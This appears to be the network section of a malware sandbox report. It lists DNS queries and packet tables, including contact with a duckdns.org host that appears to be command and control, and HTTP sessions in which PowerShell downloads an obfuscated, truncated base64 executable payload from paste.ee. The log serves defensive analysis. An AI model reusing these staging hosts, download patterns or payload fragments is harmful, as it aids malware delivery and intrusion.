Oct 22, 2024 06:17:44.588579893 CEST | 443 | 49750 | 104.20.4.235 | 192.168.2.4
Oct 22, 2024 06:17:44.588705063 CEST | 49750 | 443 | 192.168.2.4 | 104.20.4.235
Oct 22, 2024 06:17:44.606710911 CEST | 49750 | 443 | 192.168.2.4 | 104.20.4.235
Oct 22, 2024 06:17:44.606789112 CEST | 443 | 49750 | 104.20.4.235 | 192.168.2.4
Oct 22, 2024 06:17:44.607768059 CEST | 443 | 49750 | 104.20.4.235 | 192.168.2.4
Oct 22, 2024 06:17:44.619961023 CEST | 49750 | 443 | 192.168.2.4 | 104.20.4.235
Oct 22, 2024 06:17:44.663403034 CEST | 443 | 49750 | 104.20.4.235 | 192.168.2.4
Oct 22, 2024 06:17:44.762155056 CEST | 443 | 49750 | 104.20.4.235 | 192.168.2.4
Oct 22, 2024 06:17:44.762423992 CEST | 443 | 49750 | 104.20.4.235 | 192.168.2.4
Oct 22, 2024 06:17:44.762631893 CEST | 49750 | 443 | 192.168.2.4 | 104.20.4.235
Oct 22, 2024 06:17:44.779426098 CEST | 49750 | 443 | 192.168.2.4 | 104.20.4.235
Oct 22, 2024 06:17:51.809319019 CEST | 49751 | 443 | 192.168.2.4 | 104.20.4.235
Oct 22, 2024 06:17:51.809406996 CEST | 443 | 49751 | 104.20.4.235 | 192.168.2.4
Oct 22, 2024 06:17:51.809490919 CEST | 49751 | 443 | 192.168.2.4 | 104.20.4.235
Oct 22, 2024 06:17:51.811512947 CEST | 49751 | 443 | 192.168.2.4 | 104.20.4.235
Oct 22, 2024 06:17:51.811553001 CEST | 443 | 49751 | 104.20.4.235 | 192.168.2.4
Oct 22, 2024 06:17:52.434557915 CEST | 443 | 49751 | 104.20.4.235 | 192.168.2.4
Oct 22, 2024 06:17:52.434672117 CEST | 49751 | 443 | 192.168.2.4 | 104.20.4.235
Oct 22, 2024 06:17:52.451739073 CEST | 49751 | 443 | 192.168.2.4 | 104.20.4.235
Oct 22, 2024 06:17:52.451822996 CEST | 443 | 49751 | 104.20.4.235 | 192.168.2.4
Oct 22, 2024 06:17:52.452146053 CEST | 443 | 49751 | 104.20.4.235 | 192.168.2.4
Oct 22, 2024 06:17:52.486773968 CEST | 49751 | 443 | 192.168.2.4 | 104.20.4.235
Oct 22, 2024 06:17:52.527350903 CEST | 443 | 49751 | 104.20.4.235 | 192.168.2.4
Oct 22, 2024 06:17:52.632143021 CEST | 443 | 49751 | 104.20.4.235 | 192.168.2.4
Oct 22, 2024 06:17:52.632257938 CEST | 443 | 49751 | 104.20.4.235 | 192.168.2.4
Oct 22, 2024 06:17:52.632325888 CEST | 49751 | 443 | 192.168.2.4 | 104.20.4.235
Oct 22, 2024 06:17:52.633480072 CEST | 49751 | 443 | 192.168.2.4 | 104.20.4.235
Oct 22, 2024 06:18:12.639847040 CEST | 57484 | 49745 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:18:12.644210100 CEST | 49745 | 57484 | 192.168.2.4 | 43.226.229.232
Oct 22, 2024 06:18:12.649530888 CEST | 57484 | 49745 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:18:42.699285984 CEST | 57484 | 49745 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:18:42.700551033 CEST | 49745 | 57484 | 192.168.2.4 | 43.226.229.232
Oct 22, 2024 06:18:42.705885887 CEST | 57484 | 49745 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:19:12.767426968 CEST | 57484 | 49745 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:19:12.768656969 CEST | 49745 | 57484 | 192.168.2.4 | 43.226.229.232
Oct 22, 2024 06:19:12.774101019 CEST | 57484 | 49745 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:19:18.330507040 CEST | 49748 | 80 | 192.168.2.4 | 178.237.33.50
Oct 22, 2024 06:19:18.647664070 CEST | 49748 | 80 | 192.168.2.4 | 178.237.33.50
Oct 22, 2024 06:19:19.298985958 CEST | 49748 | 80 | 192.168.2.4 | 178.237.33.50
Oct 22, 2024 06:19:20.502109051 CEST | 49748 | 80 | 192.168.2.4 | 178.237.33.50
Oct 22, 2024 06:19:23.002218008 CEST | 49748 | 80 | 192.168.2.4 | 178.237.33.50
Oct 22, 2024 06:19:27.814642906 CEST | 49748 | 80 | 192.168.2.4 | 178.237.33.50
Oct 22, 2024 06:19:37.424164057 CEST | 49748 | 80 | 192.168.2.4 | 178.237.33.50
Oct 22, 2024 06:19:42.831193924 CEST | 57484 | 49745 | 43.226.229.232 | 192.168.2.4
Oct 22, 2024 06:19:42.831690073 CEST | 49745 | 57484 | 192.168.2.4 | 43.226.229.232
Oct 22, 2024 06:19:42.838329077 CEST | 57484 | 49745 | 43.226.229.232 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 22, 2024 06:17:03.118999958 CEST | 53495 | 53 | 192.168.2.4 | 1.1.1.1
Oct 22, 2024 06:17:03.517076969 CEST | 53 | 53495 | 1.1.1.1 | 192.168.2.4
Oct 22, 2024 06:17:07.919241905 CEST | 58311 | 53 | 192.168.2.4 | 1.1.1.1
Oct 22, 2024 06:17:07.930574894 CEST | 53 | 58311 | 1.1.1.1 | 192.168.2.4
Oct 22, 2024 06:17:15.074580908 CEST | 55759 | 53 | 192.168.2.4 | 1.1.1.1
Oct 22, 2024 06:17:15.087922096 CEST | 53 | 55759 | 1.1.1.1 | 192.168.2.4
Oct 22, 2024 06:17:23.253169060 CEST | 57550 | 53 | 192.168.2.4 | 1.1.1.1
Oct 22, 2024 06:17:23.261068106 CEST | 53 | 57550 | 1.1.1.1 | 192.168.2.4
Oct 22, 2024 06:17:25.653739929 CEST | 52092 | 53 | 192.168.2.4 | 1.1.1.1
Oct 22, 2024 06:17:25.769793034 CEST | 53 | 52092 | 1.1.1.1 | 192.168.2.4
Oct 22, 2024 06:17:28.328073025 CEST | 60152 | 53 | 192.168.2.4 | 1.1.1.1
Oct 22, 2024 06:17:28.337229013 CEST | 53 | 60152 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 22, 2024 06:17:03.118999958 CEST | 192.168.2.4 | 1.1.1.1 | 0x14b1 | Standard query (0) | ftp.desckvbrat.com.br | A (IP address) | IN (0x0001) | false
Oct 22, 2024 06:17:07.919241905 CEST | 192.168.2.4 | 1.1.1.1 | 0xabc7 | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false
Oct 22, 2024 06:17:15.074580908 CEST | 192.168.2.4 | 1.1.1.1 | 0xc9df | Standard query (0) | b2case.com | A (IP address) | IN (0x0001) | false
Oct 22, 2024 06:17:23.253169060 CEST | 192.168.2.4 | 1.1.1.1 | 0xf38c | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Oct 22, 2024 06:17:25.653739929 CEST | 192.168.2.4 | 1.1.1.1 | 0x6b15 | Standard query (0) | iwarsut775laudrye001.duckdns.org | A (IP address) | IN (0x0001) | false
Oct 22, 2024 06:17:28.328073025 CEST | 192.168.2.4 | 1.1.1.1 | 0x3b17 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 22, 2024 06:17:03.517076969 CEST | 1.1.1.1 | 192.168.2.4 | 0x14b1 | No error (0) | ftp.desckvbrat.com.br | desckvbrat.com.br | | CNAME (Canonical name) | IN (0x0001) | false
Oct 22, 2024 06:17:03.517076969 CEST | 1.1.1.1 | 192.168.2.4 | 0x14b1 | No error (0) | desckvbrat.com.br | | 191.252.83.213 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 06:17:07.930574894 CEST | 1.1.1.1 | 192.168.2.4 | 0xabc7 | No error (0) | paste.ee | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 06:17:07.930574894 CEST | 1.1.1.1 | 192.168.2.4 | 0xabc7 | No error (0) | paste.ee | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 06:17:15.087922096 CEST | 1.1.1.1 | 192.168.2.4 | 0xc9df | No error (0) | b2case.com | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 06:17:15.087922096 CEST | 1.1.1.1 | 192.168.2.4 | 0xc9df | No error (0) | b2case.com | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 06:17:23.261068106 CEST | 1.1.1.1 | 192.168.2.4 | 0xf38c | No error (0) | pastebin.com | | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 06:17:23.261068106 CEST | 1.1.1.1 | 192.168.2.4 | 0xf38c | No error (0) | pastebin.com | | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 06:17:23.261068106 CEST | 1.1.1.1 | 192.168.2.4 | 0xf38c | No error (0) | pastebin.com | | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 06:17:25.769793034 CEST | 1.1.1.1 | 192.168.2.4 | 0x6b15 | No error (0) | iwarsut775laudrye001.duckdns.org | | 43.226.229.232 | A (IP address) | IN (0x0001) | false
Oct 22, 2024 06:17:28.337229013 CEST | 1.1.1.1 | 192.168.2.4 | 0x3b17 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
• paste.ee
• b2case.com
• pastebin.com
• geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49748 | 178.237.33.50 | 80 | 8160 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 22, 2024 06:17:28.361958027 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Oct 22, 2024 06:17:29.198045015 CEST | 1165 | IN | HTTP/1.1 200 OK
date: Tue, 22 Oct 2024 04:17:29 GMT
server: Apache
content-length: 957
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4b 69 6c 6c 65 65 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 [TRUNCATED]
Data Ascii: { "geoplugin_request":"173.254.250.76", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Killeen", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"625", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"31.0065", "geoplugin_longitude":"-97.8406", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.449732188.114.96.34431928C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-22 04:17:08 UTC67OUTGET /d/jm8qu/0 HTTP/1.1
                                                                                                Host: paste.ee
                                                                                                Connection: Keep-Alive
2024-10-22 04:17:08 UTC | 1228 | IN | HTTP/1.1 200 OK
                                                                                                Date: Tue, 22 Oct 2024 04:17:08 GMT
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Cache-Control: max-age=2592000
                                                                                                strict-transport-security: max-age=63072000
                                                                                                x-frame-options: DENY
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1; mode=block
                                                                                                content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                cf-cache-status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a1Mhy3LlfQUal%2BaUeetc5VDzVhjjNh5zmfp4qmf9owzPZ4fg61B6aHXiTZOxxmYTOIKPTLX0VCMocPzTajkN5JcuSACTiSoTz1NOfHAS1YnZVSKGqOynDw0SBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d66ad0d1f384605-DFW
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-10-22 04:17:08 UTC190INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 30 38 39 26 73 65 6e 74 3d 34 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 32 36 30 31 39 37 36 26 63 77 6e 64 3d 32 34 39 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 39 36 39 35 33 34 32 36 32 37 32 30 38 38 63 65 26 74 73 3d 32 31 36 26 78 3d 30 22 0d 0a 0d 0a
                                                                                                Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1089&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=681&delivery_rate=2601976&cwnd=249&unsent_bytes=0&cid=96953426272088ce&ts=216&x=0"
                                                                                                2024-10-22 04:17:08 UTC1369INData Raw: 31 66 37 66 0d 0a 54 56 71 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 2f 2f 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4c 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86
                                                                                                Data Ascii: 1f7fTVqQ::M::::E:::://8::Lg:::::::::Q:::::::::::::
                                                                                                2024-10-22 04:17:08 UTC1369INData Raw: 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4d 68 49 e2 86
                                                                                                Data Ascii: B:::B::::::E:::E::::::::B:::::::::::::::MhI
                                                                                                2024-10-22 04:17:08 UTC1369INData Raw: e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 e2 86 93 3a e2 86 93 75 63 6e 4e 79 59 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 67 44 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 59 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93
                                                                                                Data Ascii: :::I::::::::::::::::::C:::G:ucnNyYw:::GgD::::Y::
                                                                                                2024-10-22 04:17:08 UTC1369INData Raw: 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 6f 6f 43 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 69 6f e2 86 93 3a e2 86 93 45 7a e2 86 93 3a e2 86 93 44 e2 86 93 3a e2 86 93 45 38 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86
                                                                                                Data Ascii: ::::::::::::::::::::::BooCg::Bio:Ez:D:E8:::::::
                                                                                                2024-10-22 04:17:08 UTC1369INData Raw: 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 51 49 6f 43 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 6a 6e 79 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 48 59 30 43 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 4a 52 5a 79 31 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 63 42 63 6f 43 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 71 49 6c 46 77 57 69 4a 52 68 79 42 77 45 e2 86 93 3a e2 86 93 63 42 6b 6f 43 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 71 49 6c 47 52 6b 6f 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 71 49 6c 47 6e 4a 48 e2 86 93 3a e2 86 93 51 42 77 46 69 67 4c e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 6f 69 55 62 42 4b 49 6c 48
                                                                                                Data Ascii: ::EQIoCQ::Cjny::::HY0C:::BJRZy1Q::cBcoCw::BqIlFwWiJRhyBwE:cBkoCw::BqIlGRkoB:::BqIlGnJH:QBwFigL:::GoiUbBKIlH
                                                                                                2024-10-22 04:17:08 UTC1226INData Raw: 93 3a e2 86 93 43 71 49 6c 47 6e 49 6d e2 86 93 3a e2 86 93 77 42 77 47 79 67 4c e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 6f 69 55 62 42 6d 38 53 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 6f 69 55 63 63 69 6f 44 e2 86 93 3a e2 86 93 48 e2 86 93 3a e2 86 93 64 4b e2 86 93 3a e2 86 93 73 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 61 69 4b e2 86 93 3a e2 86 93 6f e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 57 46 68 55 6f 44 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 69 5a 79 4c 67 4d e2 86 93 3a e2 86 93 63 42 6f 6f 43 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 6e 34 46 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 45 63 6c e2 86 93 3a e2 86
                                                                                                Data Ascii: :CqIlGnIm:wBwGygL:::GoiUbBm8S:::KoiUccioD:H:dK:s:::aiK:o:::oWFhUoDQ::CiZyLgM:cBooCw::Bn4F:::Ecl:
                                                                                                2024-10-22 04:17:08 UTC1369INData Raw: 37 30 30 30 0d 0a 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 49 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 55 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 67 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 73 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 78 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 33 38 52 42 68 64 e2 86 93 3a e2 86 93 68 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 67 58 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 45 77 63 58 4b 39 4d 57 45 77 67 59 4b 38 30 72 61 78 45 48 45 51 69 61 62 78 67 e2 86 93 3a e2
                                                                                                Data Ascii: 7000::I::::U::::Gg:::Cs::::x::::K38RBhd:hQ:::CgX:::KEwcXK9MWEwgYK80raxEHEQiabxg:
                                                                                                2024-10-22 04:17:08 UTC1369INData Raw: 86 93 43 69 59 63 4f 4f 66 39 2f 2f 38 47 4b 42 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 74 4e 58 4c 38 42 51 42 77 48 53 67 4c e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 42 6e 49 69 42 67 42 77 48 43 67 4c e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 47 4b 42 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 57 46 68 55 6f 44 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 69 59 64 4f 4c 54 39 2f 2f 38 67 36 e2 86 93 3a e2 86 93 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 67 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 42 68 73 6f 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 42 6e 49 6d 42 67 42 77 48 69 67 4c e2 86 93
                                                                                                Data Ascii: CiYcOOf9//8GKBw:::otNXL8BQBwHSgL:::GBnIiBgBwHCgL:::GKBM:::oWFhUoDQ::CiYdOLT9//8g6:M::CgE:::KBhsoB:::BnImBgBwHigL
                                                                                                2024-10-22 04:17:08 UTC1369INData Raw: 93 43 69 67 4d e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 47 43 75 66 49 49 67 54 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 42 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 68 6b 72 6b 69 67 50 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 4b 47 69 75 4b 33 67 42 2b e2 86 93 3a e2 86 93 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 67 30 66 43 6a 68 52 2f 50 2f 2f 66 67 45 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 6f 54 42 42 38 4c 4f 45 50 38 2f 2f 39 7a 49 77 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 43 68 4d 46 45 51 55 6c 4b 43 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93 70 76 4a 51 e2 86 93 3a e2 86 93 e2 86 93 3a e2 86 93
                                                                                                Data Ascii: CigM:::KGCufIIgT:::oB:::ChkrkigP:::KGiuK3gB+:Q::Cg0fCjhR/P//fgE:::oTBB8LOEP8//9zIw::ChMFEQUlKCQ:::pvJQ::


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49734 | 188.114.96.34 | 443 | 1928 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-22 04:17:13 UTC | 43 | OUT | GET /d/d80GV/0 HTTP/1.1
                                                                                                Host: paste.ee
2024-10-22 04:17:13 UTC | 1230 | IN | HTTP/1.1 200 OK
                                                                                                Date: Tue, 22 Oct 2024 04:17:13 GMT
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Cache-Control: max-age=2592000
                                                                                                strict-transport-security: max-age=63072000
                                                                                                x-frame-options: DENY
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1; mode=block
                                                                                                content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                cf-cache-status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vtQA7R2xv0jWZEy1V9SIKto354JpdaKXLbwUsNDDy2P4%2BQ7gYCfnT1GC6n8H44LHnAMBagtiTZQvFm%2FHqgA1cWz1POl3AB9aEA3pbKcStICUjTHwFCAPDApDew%3D%3D"}],"group":"cf-nel","max_age":604800}
